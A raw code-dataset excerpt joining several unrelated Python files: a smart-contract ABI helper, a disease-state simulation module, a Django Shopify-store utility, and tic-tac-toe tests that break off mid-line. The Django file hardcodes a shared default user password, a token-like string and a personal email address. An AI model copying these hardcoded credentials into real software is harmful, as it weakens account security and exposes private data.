constructor_abi\n\n @staticmethod\n def __get_abi_params(abi_entity):\n return abi_entity.get('params', [])\n\n\nclass FunctionCall:\n\n def __init__(self, method_name, params, contract, locking_script=None, unlocking_script=None):\n if not (locking_script or unlocking_script):\n raise Exception('Binding locking_script and unlocking_script can\\'t both be empty.')\n\n self.contract = contract\n self.locking_script = locking_script\n self.unlocking_script = unlocking_script\n self.method_name = method_name\n\n self.args = []\n for entity in self.contract.abi:\n if (method_name == 'constructor' and entity['type'] == 'constructor') or \\\n ('name' in entity and entity['name'] == method_name):\n for idx, param in enumerate(entity['params']):\n self.args.append({\n 'name': param['name'],\n 'type': param['type'],\n 'value': params[idx]\n })\n\n def verify(self, tx_input_context=utils.create_dummy_input_context(), interpreter_limits=None,\n use_contract_script_pair=True):\n '''\n Evaluate lock and unlock script pair using the passed TxInputContext object.\n Additionally an InterpreterLimits object can be passed to limit the scope of verification.\n\n If not TxInputContext object is passed, a dummy context object gets created and used in the verification \n process.\n\n If use_contract_script_pair is set to True (defaults to True), then evaluate the scriptPubKey and scriptSig\n pair of the contract object, instead of the ones passed via the TxInputContext object.\n '''\n assert isinstance(tx_input_context, TxInputContext)\n\n if not self.unlocking_script:\n raise Exception('Cannot verify function \"{}\". \\\n FunctionCall object is missing unlocking_script property.'.format(self.method_name))\n\n if not interpreter_limits:\n policies = [\n # A fairly restrictive policy\n MinerPolicy(100_000, 64, 20_000, 1_000, 16),\n # A loose policy\n MinerPolicy(10_000_000, 256, 10_000_000, 32_000, 256)\n ]\n interpreter_limits = InterpreterLimits(policies[1], is_genesis_enabled=True, is_consensus=True, base_flags='consensus')\n\n # Make a deep copy of the passed TxInputContext object, because it may be modified from here on.\n tx_input_context = copy.deepcopy(tx_input_context)\n\n if use_contract_script_pair:\n self.update_input_context_scripts(tx_input_context)\n\n return tx_input_context.verify_input(interpreter_limits)\n\n def update_input_context_scripts(self, tx_input_context):\n '''\n Updates the unlocking input script (scriptSig) and the matching UTXOs locking script (scriptPubKey)\n to the unlocking script of this FunctionCall object and the locking script of the contract object it belongs to.\n\n Notice, that the function doesn't create a copy of the context object, but rather just modifies it.\n '''\n # Set unlock script for passed input context.\n input_index = tx_input_context.input_index\n tx_input_context.tx.inputs[input_index].script_sig = self.unlocking_script\n\n # Set utxo script to verify sciptSig against.\n tx_input_context.utxo.script_pubkey = self.contract.locking_script\n\n return tx_input_context\n\n @property\n def script(self):\n '''\n The function calls scriptSig.\n '''\n return self.unlocking_script\n\n\ndef escape_str_for_regex(string):\n special_chars = {'-', '\\\\', '^', '$', '*', '+', '?', '.', '(', ')', '|', '[', ']', '{', '}'}\n res_buff = []\n for c in string:\n if c in special_chars:\n res_buff.append('\\\\')\n res_buff.append(c)\n return ''.join(res_buff)\n","sub_path":"scryptlib/abi.py","file_name":"abi.py","file_ext":"py","file_size_in_byte":10923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"394425421","text":"\"\"\"\n==============\nDisease States\n==============\n\nThis module contains tools to manage standard disease states.\n\n\"\"\"\nfrom typing import Callable, Dict, List\n\nimport numpy as np\nimport pandas as pd\nfrom vivarium.framework.population import PopulationView, SimulantData\nfrom vivarium.framework.state_machine import State, Transient, Transition\nfrom vivarium.framework.values import list_combiner, union_post_processor\n\nfrom vivarium_public_health.disease.transition import (\n ProportionTransition,\n RateTransition,\n TransitionString,\n)\nfrom vivarium_public_health.utilities import is_non_zero\n\n\nclass BaseDiseaseState(State):\n def __init__(\n self, cause, name_prefix=\"\", side_effect_function=None, cause_type=\"cause\", **kwargs\n ):\n super().__init__(name_prefix + cause, **kwargs) # becomes state_id\n self.cause_type = cause_type\n self.cause = cause\n\n self.side_effect_function = side_effect_function\n if self.side_effect_function is not None:\n self._sub_components.append(side_effect_function)\n\n self.event_time_column = self.state_id + \"_event_time\"\n self.event_count_column = self.state_id + \"_event_count\"\n\n @property\n def columns_created(self):\n return [self.event_time_column, self.event_count_column]\n\n # noinspection PyAttributeOutsideInit\n def setup(self, builder):\n \"\"\"Performs this component's simulation setup.\n\n Parameters\n ----------\n builder : `engine.Builder`\n Interface to several simulation tools.\n \"\"\"\n super().setup(builder)\n\n self.clock = builder.time.clock()\n\n view_columns = self.columns_created + [self._model, \"alive\"]\n self.population_view = builder.population.get_view(view_columns)\n builder.population.initializes_simulants(\n self.on_initialize_simulants,\n creates_columns=self.columns_created,\n requires_columns=[self._model],\n )\n\n def on_initialize_simulants(self, pop_data: SimulantData) -> None:\n \"\"\"Adds this state's columns to the simulation state table.\"\"\"\n for transition in self.transition_set:\n if transition.start_active:\n transition.set_active(pop_data.index)\n\n pop_update = self.get_initial_event_times(pop_data)\n self.population_view.update(pop_update)\n\n def get_initial_event_times(self, pop_data: SimulantData) -> pd.DataFrame:\n return pd.DataFrame(\n {self.event_time_column: pd.NaT, self.event_count_column: 0}, index=pop_data.index\n )\n\n def _transition_side_effect(self, index, event_time):\n \"\"\"Updates the simulation state and triggers any side effects associated with this state.\n\n Parameters\n ----------\n index\n An iterable of integer labels for the simulants.\n event_time : pandas.Timestamp\n The time at which this transition occurs.\n\n \"\"\"\n pop = self.population_view.get(index)\n pop[self.event_time_column] = event_time\n pop[self.event_count_column] += 1\n self.population_view.update(pop)\n\n if self.side_effect_function is not None:\n self.side_effect_function(index, event_time)\n\n ##################\n # Public methods #\n ##################\n\n def get_transition_names(self) -> List[str]:\n transitions = []\n for trans in self.transition_set.transitions:\n _, _, init_state, _, end_state = trans.name.split(\".\")\n transitions.append(TransitionString(f\"{init_state}_TO_{end_state}\"))\n return transitions\n\n def add_transition(\n self,\n output: State,\n source_data_type: str = None,\n get_data_functions: Dict[str, Callable] = None,\n **kwargs,\n ) -> Transition:\n \"\"\"Builds a transition from this state to the given state.\n\n Parameters\n ----------\n output\n The end state after the transition.\n\n source_data_type\n the type of transition: either 'rate' or 'proportion'\n\n get_data_functions\n map from transition type to the function to pull that transition's data\n\n Returns\n -------\n vivarium.framework.state_machine.Transition\n The created transition object.\n\n \"\"\"\n transition_map = {\"rate\": RateTransition, \"proportion\": ProportionTransition}\n\n if not source_data_type:\n return super().add_transition(output, **kwargs)\n elif source_data_type in transition_map:\n t = transition_map[source_data_type](self, output, get_data_functions, **kwargs)\n self.transition_set.append(t)\n return t\n else:\n raise ValueError(f\"Unrecognized data type {source_data_type}\")\n\n\nclass SusceptibleState(BaseDiseaseState):\n def __init__(self, cause, *args, **kwargs):\n super().__init__(cause, *args, name_prefix=\"susceptible_to_\", **kwargs)\n\n def add_transition(\n self,\n output: State,\n source_data_type: str = None,\n get_data_functions: Dict[str, Callable] = None,\n **kwargs,\n ) -> Transition:\n if source_data_type == \"rate\":\n if get_data_functions is None:\n get_data_functions = {\n \"incidence_rate\": lambda builder, cause: builder.data.load(\n f\"{self.cause_type}.{cause}.incidence_rate\"\n )\n }\n elif \"incidence_rate\" not in get_data_functions:\n raise ValueError(\"You must supply an incidence rate function.\")\n elif source_data_type == \"proportion\":\n if \"proportion\" not in get_data_functions:\n raise ValueError(\"You must supply a proportion function.\")\n\n return super().add_transition(output, source_data_type, get_data_functions, **kwargs)\n\n\nclass RecoveredState(BaseDiseaseState):\n def __init__(self, cause, *args, **kwargs):\n super().__init__(cause, *args, name_prefix=\"recovered_from_\", **kwargs)\n\n def add_transition(\n self,\n output: State,\n source_data_type: str = None,\n get_data_functions: Dict[str, Callable] = None,\n **kwargs,\n ) -> Transition:\n if source_data_type == \"rate\":\n if get_data_functions is None:\n get_data_functions = {\n \"incidence_rate\": lambda builder, cause: builder.data.load(\n f\"{self.cause_type}.{cause}.incidence_rate\"\n )\n }\n elif \"incidence_rate\" not in get_data_functions:\n raise ValueError(\"You must supply an incidence rate function.\")\n elif source_data_type == \"proportion\":\n if \"proportion\" not in get_data_functions:\n raise ValueError(\"You must supply a proportion function.\")\n\n return super().add_transition(output, source_data_type, get_data_functions, **kwargs)\n\n\nclass DiseaseState(BaseDiseaseState):\n \"\"\"State representing a disease in a state machine model.\"\"\"\n\n def __init__(self, cause, get_data_functions=None, cleanup_function=None, **kwargs):\n \"\"\"\n Parameters\n ----------\n cause : str\n The name of this state.\n disability_weight : pandas.DataFrame or float, optional\n The amount of disability associated with this state.\n prevalence_data : pandas.DataFrame, optional\n The baseline occurrence of this state in a population.\n dwell_time : pandas.DataFrame or pandas.Timedelta, optional\n The minimum time a simulant exists in this state.\n event_time_column : str, optional\n The name of a column to track the last time this state was entered.\n event_count_column : str, optional\n The name of a column to track the number of times this state was entered.\n side_effect_function : callable, optional\n A function to be called when this state is entered.\n \"\"\"\n super().__init__(cause, **kwargs)\n\n self.excess_mortality_rate_pipeline_name = f\"{self.state_id}.excess_mortality_rate\"\n self.excess_mortality_rate_paf_pipeline_name = (\n f\"{self.excess_mortality_rate_pipeline_name}.paf\"\n )\n\n self._get_data_functions = (\n get_data_functions if get_data_functions is not None else {}\n )\n self.cleanup_function = cleanup_function\n\n if self.cause is None and not set(self._get_data_functions.keys()).issuperset(\n [\"disability_weight\", \"dwell_time\", \"prevalence\"]\n ):\n raise ValueError(\n \"If you do not provide a cause, you must supply\"\n \"custom data gathering functions for disability_weight, prevalence, and dwell_time.\"\n )\n\n # noinspection PyAttributeOutsideInit\n def setup(self, builder):\n \"\"\"Performs this component's simulation setup.\n\n Parameters\n ----------\n builder : `engine.Builder`\n Interface to several simulation tools.\n \"\"\"\n super().setup(builder)\n\n prevalence_data = self.load_prevalence_data(builder)\n self.prevalence = builder.lookup.build_table(\n prevalence_data, key_columns=[\"sex\"], parameter_columns=[\"age\", \"year\"]\n )\n\n birth_prevalence_data = self.load_birth_prevalence_data(builder)\n self.birth_prevalence = builder.lookup.build_table(\n birth_prevalence_data, key_columns=[\"sex\"], parameter_columns=[\"year\"]\n )\n\n dwell_time_data = self.load_dwell_time_data(builder)\n self.dwell_time = builder.value.register_value_producer(\n f\"{self.state_id}.dwell_time\",\n source=builder.lookup.build_table(\n dwell_time_data, key_columns=[\"sex\"], parameter_columns=[\"age\", \"year\"]\n ),\n requires_columns=[\"age\", \"sex\"],\n )\n\n disability_weight_data = self.load_disability_weight_data(builder)\n self.has_disability = is_non_zero(disability_weight_data)\n self.base_disability_weight = builder.lookup.build_table(\n disability_weight_data, key_columns=[\"sex\"], parameter_columns=[\"age\", \"year\"]\n )\n self.disability_weight = builder.value.register_value_producer(\n f\"{self.state_id}.disability_weight\",\n source=self.compute_disability_weight,\n requires_columns=[\"age\", \"sex\", \"alive\", self._model],\n )\n builder.value.register_value_modifier(\n \"disability_weight\", modifier=self.disability_weight\n )\n\n excess_mortality_data = self.load_excess_mortality_rate_data(builder)\n self.has_excess_mortality = is_non_zero(excess_mortality_data)\n self.base_excess_mortality_rate = builder.lookup.build_table(\n excess_mortality_data, key_columns=[\"sex\"], parameter_columns=[\"age\", \"year\"]\n )\n self.excess_mortality_rate = builder.value.register_rate_producer(\n self.excess_mortality_rate_pipeline_name,\n source=self.compute_excess_mortality_rate,\n requires_columns=[\"age\", \"sex\", \"alive\", self._model],\n requires_values=[self.excess_mortality_rate_paf_pipeline_name],\n )\n paf = builder.lookup.build_table(0)\n self.joint_paf = builder.value.register_value_producer(\n self.excess_mortality_rate_paf_pipeline_name,\n source=lambda idx: [paf(idx)],\n preferred_combiner=list_combiner,\n preferred_post_processor=union_post_processor,\n )\n builder.value.register_value_modifier(\n \"mortality_rate\",\n modifier=self.adjust_mortality_rate,\n requires_values=[self.excess_mortality_rate_pipeline_name],\n )\n\n self.randomness_prevalence = builder.randomness.get_stream(\n f\"{self.state_id}_prevalent_cases\"\n )\n\n def get_initial_event_times(self, pop_data: SimulantData) -> pd.DataFrame:\n pop_update = super().get_initial_event_times(pop_data)\n\n simulants_with_condition = self.population_view.subview([self._model]).get(\n pop_data.index, query=f'{self._model}==\"{self.state_id}\"'\n )\n if not simulants_with_condition.empty:\n infected_at = self._assign_event_time_for_prevalent_cases(\n simulants_with_condition,\n self.clock(),\n self.randomness_prevalence.get_draw,\n self.dwell_time,\n )\n pop_update.loc[infected_at.index, self.event_time_column] = infected_at\n\n return pop_update\n\n def compute_disability_weight(self, index):\n \"\"\"Gets the disability weight associated with this state.\n\n Parameters\n ----------\n index\n An iterable of integer labels for the simulants.\n\n Returns\n -------\n `pandas.Series`\n An iterable of disability weights indexed by the provided `index`.\n \"\"\"\n disability_weight = pd.Series(0, index=index)\n with_condition = self.with_condition(index)\n disability_weight.loc[with_condition] = self.base_disability_weight(with_condition)\n return disability_weight\n\n def compute_excess_mortality_rate(self, index):\n excess_mortality_rate = pd.Series(0, index=index)\n with_condition = self.with_condition(index)\n base_excess_mort = self.base_excess_mortality_rate(with_condition)\n joint_mediated_paf = self.joint_paf(with_condition)\n excess_mortality_rate.loc[with_condition] = base_excess_mort * (\n 1 - joint_mediated_paf.values\n )\n return excess_mortality_rate\n\n def adjust_mortality_rate(self, index, rates_df):\n \"\"\"Modifies the baseline mortality rate for a simulant if they are in this state.\n\n Parameters\n ----------\n index\n An iterable of integer labels for the simulants.\n rates_df : `pandas.DataFrame`\n\n \"\"\"\n rate = self.excess_mortality_rate(index, skip_post_processor=True)\n rates_df[self.state_id] = rate\n return rates_df\n\n def with_condition(self, index):\n pop = self.population_view.subview([\"alive\", self._model]).get(index)\n with_condition = pop.loc[\n (pop[self._model] == self.state_id) & (pop[\"alive\"] == \"alive\")\n ].index\n return with_condition\n\n @staticmethod\n def _assign_event_time_for_prevalent_cases(\n infected, current_time, randomness_func, dwell_time_func\n ):\n dwell_time = dwell_time_func(infected.index)\n infected_at = dwell_time * randomness_func(infected.index)\n infected_at = current_time - pd.to_timedelta(infected_at, unit=\"D\")\n return infected_at\n\n def add_transition(\n self,\n output: State,\n source_data_type: str = None,\n get_data_functions: Dict[str, Callable] = None,\n **kwargs,\n ) -> Transition:\n if source_data_type == \"rate\":\n if get_data_functions is None:\n get_data_functions = {\n \"remission_rate\": lambda builder, cause: builder.data.load(\n f\"{self.cause_type}.{cause}.remission_rate\"\n )\n }\n elif (\n \"remission_rate\" not in get_data_functions\n and \"transition_rate\" not in get_data_functions\n ):\n raise ValueError(\n \"You must supply a transition rate or remission rate function.\"\n )\n elif source_data_type == \"proportion\":\n if \"proportion\" not in get_data_functions:\n raise ValueError(\"You must supply a proportion function.\")\n return super().add_transition(output, source_data_type, get_data_functions, **kwargs)\n\n def next_state(\n self, index: pd.Index, event_time: pd.Timestamp, population_view: PopulationView\n ):\n \"\"\"Moves a population among different disease states.\n\n Parameters\n ----------\n index\n An iterable of integer labels for the simulants.\n event_time:\n The time at which this transition occurs.\n population_view:\n A view of the internal state of the simulation.\n \"\"\"\n eligible_index = self._filter_for_transition_eligibility(index, event_time)\n return super().next_state(eligible_index, event_time, population_view)\n\n def _filter_for_transition_eligibility(self, index, event_time):\n \"\"\"Filter out all simulants who haven't been in the state for the prescribed dwell time.\n\n Parameters\n ----------\n index\n An iterable of integer labels for the simulants.\n\n Returns\n -------\n pd.Index\n A filtered index of the simulants.\n \"\"\"\n population = self.population_view.get(index, query='alive == \"alive\"')\n if np.any(self.dwell_time(index)) > 0:\n state_exit_time = population[self.event_time_column] + pd.to_timedelta(\n self.dwell_time(index), unit=\"D\"\n )\n return population.loc[state_exit_time <= event_time].index\n else:\n return index\n\n def _cleanup_effect(self, index, event_time):\n if self.cleanup_function is not None:\n self.cleanup_function(index, event_time)\n\n def load_prevalence_data(self, builder):\n if \"prevalence\" in self._get_data_functions:\n return self._get_data_functions[\"prevalence\"](builder, self.cause)\n else:\n return builder.data.load(f\"{self.cause_type}.{self.cause}.prevalence\")\n\n def load_birth_prevalence_data(self, builder):\n if \"birth_prevalence\" in self._get_data_functions:\n return self._get_data_functions[\"birth_prevalence\"](builder, self.cause)\n else:\n return 0\n\n def load_dwell_time_data(self, builder):\n if \"dwell_time\" in self._get_data_functions:\n dwell_time = self._get_data_functions[\"dwell_time\"](builder, self.cause)\n else:\n dwell_time = 0\n\n if isinstance(dwell_time, pd.Timedelta):\n dwell_time = dwell_time.total_seconds() / (60 * 60 * 24)\n if (\n isinstance(dwell_time, pd.DataFrame) and np.any(dwell_time.value != 0)\n ) or dwell_time > 0:\n self.transition_set.allow_null_transition = True\n\n return dwell_time\n\n def load_disability_weight_data(self, builder):\n if \"disability_weight\" in self._get_data_functions:\n disability_weight = self._get_data_functions[\"disability_weight\"](\n builder, self.cause\n )\n else:\n disability_weight = builder.data.load(\n f\"{self.cause_type}.{self.cause}.disability_weight\"\n )\n\n if isinstance(disability_weight, pd.DataFrame) and len(disability_weight) == 1:\n disability_weight = disability_weight.value[0] # sequela only have single value\n\n return disability_weight\n\n def load_excess_mortality_rate_data(self, builder):\n if \"excess_mortality_rate\" in self._get_data_functions:\n return self._get_data_functions[\"excess_mortality_rate\"](builder, self.cause)\n elif builder.data.load(f\"cause.{self._model}.restrictions\")[\"yld_only\"]:\n return 0\n else:\n return builder.data.load(f\"{self.cause_type}.{self.cause}.excess_mortality_rate\")\n\n def __repr__(self):\n return \"DiseaseState({})\".format(self.state_id)\n\n\nclass TransientDiseaseState(BaseDiseaseState, Transient):\n def __repr__(self):\n return \"TransientDiseaseState(name={})\".format(self.state_id)\n","sub_path":"src/vivarium_public_health/disease/state.py","file_name":"state.py","file_ext":"py","file_size_in_byte":19748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"48397415","text":"from django.contrib.auth.models import User\r\nfrom django.core.exceptions import (PermissionDenied)\r\nfrom rest_framework import serializers\r\nfrom rest_framework_jwt.settings import api_settings\r\n\r\nfrom stores.models import Merchant, Store\r\nfrom vfrlight.config import Config as cfg\r\nfrom vfrlight.tasks import (initilize_webhooks, intitalize_scripttag,\r\n sync_collections, sync_products, getlocaletaskandemail)\r\n\r\n\r\ndef verify_store_access_token(request, store):\r\n jwt_token = request.META.get('HTTP_AUTHORIZATION')\r\n jwt_decode_handler = api_settings.JWT_DECODE_HANDLER\r\n username = jwt_decode_handler(jwt_token.split(' ')[1])['username']\r\n if not store.owner.user.username == username:\r\n raise PermissionDenied()\r\n\r\n\r\ndef get_or_raise(classmodel, **kwargs):\r\n try:\r\n return classmodel.objects.get(**kwargs)\r\n except Exception as e:\r\n raise serializers.ValidationError(e)\r\n\r\n\r\ndef generate_token(user):\r\n jwt_payload_handler = api_settings.JWT_PAYLOAD_HANDLER\r\n jwt_encode_handler = api_settings.JWT_ENCODE_HANDLER\r\n\r\n payload = jwt_payload_handler(user)\r\n token = jwt_encode_handler(payload)\r\n return token\r\n\r\nfrom django.core.mail import send_mail\r\nfrom vfrlight.settings import EMAIL_HOST_USER\r\nimport sys\r\ndef initialize(token, shop, ignore_webhooks=False, ignore_scripttag=False, source=\"connect\"):\r\n try:\r\n user = User.objects.get(\r\n username=(shop + \"_User\"))\r\n merchant = Merchant.objects.get(user=user)\r\n store = Store.objects.get(owner=merchant)\r\n store.token = token\r\n store.save()\r\n except User.DoesNotExist:\r\n user = User.objects.create_user(\r\n username=shop + \"_User\", password='user12345')\r\n merchant = Merchant.objects.create(user=user)\r\n store = Store.objects.create(\r\n url=shop, token=token, owner=merchant)\r\n\r\n if ignore_webhooks:\r\n store.webhooks_added = True\r\n store.save()\r\n if ignore_scripttag:\r\n store.scripttag_added = True\r\n store.save()\r\n\r\n if cfg.getLocale:\r\n getLocale(store.slug)\r\n\r\n if cfg.Async:\r\n asynchronous_initialization(store.slug, source)\r\n else:\r\n non_asynchronous_initialization(store.slug, source)\r\n\r\n jwt_payload_handler = api_settings.JWT_PAYLOAD_HANDLER\r\n jwt_encode_handler = api_settings.JWT_ENCODE_HANDLER\r\n\r\n payload = jwt_payload_handler(store.owner.user)\r\n token = jwt_encode_handler(payload)\r\n\r\n return store, token\r\n\r\n\r\ndef asynchronous_initialization(store_slug, source):\r\n # if source == \"connect\" and Store.objects.get(slug=store_slug).did_fetch_data_during_connect is True:\r\n # return\r\n send_mail(\r\n \"Welcome to asynchronous_initialization function\",\r\n \"Hello \",\r\n EMAIL_HOST_USER,\r\n [\"surinder.indybytes@gmail.com\"],\r\n fail_silently=True,\r\n )\r\n initilize_webhooks.delay(store_slug)\r\n intitalize_scripttag.delay(store_slug)\r\n # changed here not condition\r\n if cfg.IGNORE_SYNC_DURING_CONNECT:\r\n sync_products.delay(store_slug)\r\n sync_collections.delay(store_slug)\r\n if source == \"connect\":\r\n Store.objects.filter(slug=store_slug).update(did_fetch_data_during_connect=True)\r\n\r\n\r\ndef getLocale(store_slug):\r\n if cfg.IGNORE_SYNC_DURING_CONNECT:\r\n getlocaletaskandemail(store_slug)\r\n else:\r\n getlocaletaskandemail.delay(store_slug)\r\n\r\n\r\ndef non_asynchronous_initialization(store_slug, source):\r\n # if(not cfg.DEBUG):\r\n # initilize_webhooks(store_slug)\r\n # intitalize_scripttag(store_slug)\r\n if source == \"connect\" and Store.objects.get(slug=store_slug).did_fetch_data_during_connect is True:\r\n return\r\n initilize_webhooks(store_slug)\r\n intitalize_scripttag(store_slug)\r\n # for performance issues, do not sync when you are connecting\r\n if not cfg.IGNORE_SYNC_DURING_CONNECT:\r\n sync_products(store_slug)\r\n sync_collections(store_slug)\r\n if source == \"connect\":\r\n Store.objects.filter(slug=store_slug).update(did_fetch_data_during_connect=True)\r\n\r\n\r\ndef fake_initialize():\r\n initialize('1f145682dd384b589a7f1a2fa1bfc28f',\r\n 'meet10.myshopify.com', ignore_webhooks=True,\r\n ignore_scripttag=True)\r\n","sub_path":"vfrlight/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":4301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"498742032","text":"#!/usr/bin/env python3\n\nfrom typing import Optional, List\n\nimport unittest\n\nclass InvalidMarkers(Exception):\n pass\n\nclass Grid:\n textual_positions = ['top_left', 'top_middle', 'top_right',\n 'middle_left', 'center', 'middle_right',\n 'bottom_left', 'bottom_middle', 'bottom_right']\n def __init__(self, markers: str = \"XO\") -> None:\n if len(markers) != 2:\n raise InvalidMarkers()\n if markers[0] == markers[1]:\n raise InvalidMarkers()\n self.played_positions = dict()\n self.markers = markers\n def is_empty(self) -> bool:\n return len(self.played_positions) == 0\n def is_full(self) -> bool:\n return len(self.played_positions) == 9\n def get_grid(self) -> str:\n if self.is_empty():\n return \" \"*9\n return \"\".join(self.played_positions[posn]\n if posn in self.played_positions else \" \"\n for posn in self.textual_positions)\n def __str__(self) -> str:\n return self.get_grid()\n def play(self, position: str) -> Optional[str]:\n if position in self.played_positions:\n return None\n if position not in self.textual_positions:\n return None\n marker = self.markers[len(self.played_positions)%2]\n self.played_positions[position] = marker\n return marker\n def get_winning_player(self) -> Optional[str]:\n if self.is_empty() or len(self.played_positions) < 5:\n return None\n winning_lines = [{'top_left', 'middle_left', 'bottom_left'}, # Down\n {'top_middle', 'center', 'bottom_middle'},\n {'top_right', 'middle_right', 'bottom_right'},\n {'top_left', 'top_middle', 'top_right'}, # Across\n {'middle_left', 'center', 'middle_right'},\n {'bottom_left', 'bottom_middle', 'bottom_right'},\n {'top_left', 'center', 'bottom_right'}, # Diagonal\n {'top_right', 'center', 'bottom_left'},\n ]\n for marker in self.markers:\n positions = {k for k, v in self.played_positions.items() if v is marker}\n if len([line for line in winning_lines if positions.issuperset(line)]):\n return marker\n return None\n\nclass TicTacToeTest(unittest.TestCase):\n player_1 = \"X\"\n player_2 = \"O\"\n def make_grid(self):\n return Grid()\n\n def setUp(self):\n self.grid = self.make_grid()\n def test_too_few_markers(self):\n with self.assertRaises(InvalidMarkers):\n grid = Grid(\"O\")\n def test_too_many_markers(self):\n with self.assertRaises(InvalidMarkers):\n grid = Grid(\"OXY\")\n def test_duplicate_markers(self):\n with self.assertRaises(InvalidMarkers):\n grid = Grid(\"OO\")\n def test_havegrid(self):\n assert(self.grid is not None)\n def test_startgrid_is_empty_and_not_full(self):\n assert(self.grid.is_empty())\n self.assertFalse(self.grid.is_full())\n def test_not_empty_and_not_full_after_play_center(self):\n assert(self.grid.play('center'))\n assert(not self.grid.is_empty())\n self.assertFalse(self.grid.is_full())\n def test_play_center_twice_fails(self):\n assert(self.grid.play('center'))\n assert(not self.grid.play('center'))\n def test_play_top_left_twice(self):\n assert(self.grid.play('top_left'))\n assert(not self.grid.play('top_left'))\n def test_play_center_then_top_left(self):\n assert(self.grid.play('center'))\n assert(self.grid.play('top_left'))\n def test_bad_play_position(self):\n self.assertEqual(self.grid.play('cheese'), None)\n def test_all_textual_moves(self):\n for move in Grid.textual_positions:\n self.assertIsNotNone(self.grid.play(move), move)\n def test_is_full_after_all_moves_made(self):\n for move in Grid.textual_positions:\n self.grid.play(move)\n self.assertEqual(self.grid.is_full(), True)\n def test_no_player_won_with_empty_grid(self):\n self.assertEqual(self.grid.get_winning_player(), None)\n def test_no_player_won_after_one_play(self):\n self.grid.play('center')\n self.assertEqual(self.grid.get_winning_player(), None)\n def test_alternating_play_marks(self):\n self.assertEqual(self.grid.play('center'), self.player_1)\n self.assertEqual(self.grid.play('top_left'), self.player_2)\n self.assertEqual(self.grid.play('bottom_middle'), self.player_1)\n self.assertEqual(self.grid.play('bottom_left'), self.player_2)\n def test_many_plays_but_no_player_won_yet(self):\n moves = ['top_left', 'top_right', 'middle_left', 'middle_right', 'center']\n for move in moves:\n self.grid.play(move)\n self.assertEqual(self.grid.get_winning_player(), None)\n\n def _make_plays(self, first_moves, second_moves, grid=None):\n if grid is None:\n grid = self.grid\n moves = first_moves + second_moves\n moves[::2] = first_moves\n moves[1::2] = second_moves\n for move in moves:\n grid.play(move)\n def _get_grids_for_multiple_encoded_plays(self, first_moves, second_moves):\n grids = []\n for game_first, game_second in zip(first_moves, second_moves):\n grid = self.make_grid()\n game_first = [Grid.textual_positions[i] for i in game_first]\n game_second = [Grid.textual_positions[j] for j in game_second]\n self._make_plays(game_first, game_second, grid)\n grids.append((grid, game_first, game_second))\n return grids\n\n def test_first_player_should_win_on_left(self):\n moves = ['top_left', 'top_right', 'middle_left', 'middle_right', 'bottom_left']\n for move in moves:\n self.grid.play(move)\n self.assertEqual(self.grid.get_winning_player(), self.player_1)\n def test_first_player_should_win_on_right(self):\n moves = ['top_right', 'top_left', 'middle_right', 'middle_left', 'bottom_right']\n for move in moves:\n self.grid.play(move)\n self.assertEqual(self.grid.get_winning_player(), self.player_1)\n def test_second_player_should_win_on_left(self):\n moves = ['top_left', 'top_right', 'middle_left', 'middle_right', 'center', 'bottom_right']\n for move in moves:\n self.grid.play(move)\n self.assertEqual(self.grid.get_winning_player(), self.player_2)\n def test_second_player_should_win_on_right(self):\n moves = ['top_right', 'top_left', 'middle_right', 'middle_left', 'center', 'bottom_left']\n for move in moves:\n self.grid.play(move)\n self.assertEqual(self.grid.get_winning_player(), self.player_2)\n def test_second_player_should_win_on_top(self):\n player_1_moves = ['bottom_left', 'bottom_middle', 'center']\n player_2_moves = ['top_left', 'top_middle', 'top_right']\n self._make_plays(player_1_moves, player_2_moves)\n self.assertEqual(self.grid.get_winning_player(), self.player_2)\n def test_second_player_should_win_on_bottom(self):\n player_1_moves = ['top_left', 'top_middle', 'center']\n player_2_moves = ['bottom_left', 'bottom_middle', 'bottom_right']\n self._make_plays(player_1_moves, player_2_moves)\n self.assertEqual(self.grid.get_winning_player(), self.player_2)\n def test_second_player_should_win_middle_horizontally(self):\n player_1_moves = ['top_left', 'top_middle', 'bottom_left']\n player_2_moves = ['middle_left', 'center', 'middle_right']\n self._make_plays(player_1_moves, player_2_moves)\n self.assertEqual(self.grid.get_winning_player(), self.player_2)\n def test_second_player_should_win_middle_vertically(self):\n player_1_moves = ['top_left', 'bottom_right', 'bottom_left']\n player_2_moves = ['top_middle', 'center', 'bottom_middle']\n self._make_plays(player_1_moves, player_2_moves)\n self.assertEqual(self.grid.get_winning_player(), self.player_2)\n def test_first_player_should_win_horizontally_x3(self):\n player_1_moves = [[0,1,2], [3,4,5], [6,7,8]]\n player_2_moves = [[3,4], [6,7], [0,1]] # Abitrary valid other moves\n for grid, first, second in self._get_grids_for_multiple_encoded_plays(player_1_moves, player_2_moves):\n self.assertEqual(grid.get_winning_player(), self.player_1, (first, second))\n def test_first_player_should_win_vertically_x3(self):\n player_1_moves = [[0,3,6], [1,4,7], [2,5,8]]\n player_2_moves = [[1,2], [2,3], [3,4]] # Abitrary valid other moves\n for grid, first, second in self._get_grids_for_multiple_encoded_plays(player_1_moves, player_2_moves):\n self.assertEqual(grid.get_winning_player(), self.player_1, (first, second))\n def test_first_player_should_win_diagonally_x2(self):\n player_1_moves = [[0,4,8], [2,4,6]]\n player_2_moves = [[1,2], [3,5]] # Abitrary valid other moves\n for grid, first, second in self._get_grids_for_multiple_encoded_plays(player_1_moves, player_2_moves):\n self.assertEqual(grid.get_winning_player(), self.player_1, (first, second))\n def test_second_player_should_win_horizontally_x3(self):\n player_1_moves = [[0,1,6], [3,4,1], [6,7,3]] # Abitrary valid other moves\n player_2_moves = [[3,4,5], [6,7,8], [0,1,2]]\n for grid, first, second in self._get_grids_for_multiple_encoded_plays(player_1_moves, player_2_moves):\n self.assertEqual(grid.get_winning_player(), self.player_2, (first, second))\n def test_second_player_should_win_vertically_x3(self):\n player_1_moves = [[0,3,5], [1,4,5], [1,4,6]] # Abitrary valid other moves\n player_2_moves = [[1,4,7], [0,3,6], [2,5,8]]\n for grid, first, second in self._get_grids_for_multiple_encoded_plays(player_1_moves, player_2_moves):\n self.assertEqual(grid.get_winning_player(), self.player_2, (first, second))\n def test_second_player_should_win_diagonally_x2(self):\n player_1_moves = [[1,3,7], [1,0,3]] # Abitrary valid other moves\n player_2_moves = [[0,4,8], [2,4,6]]\n for grid, first, second in 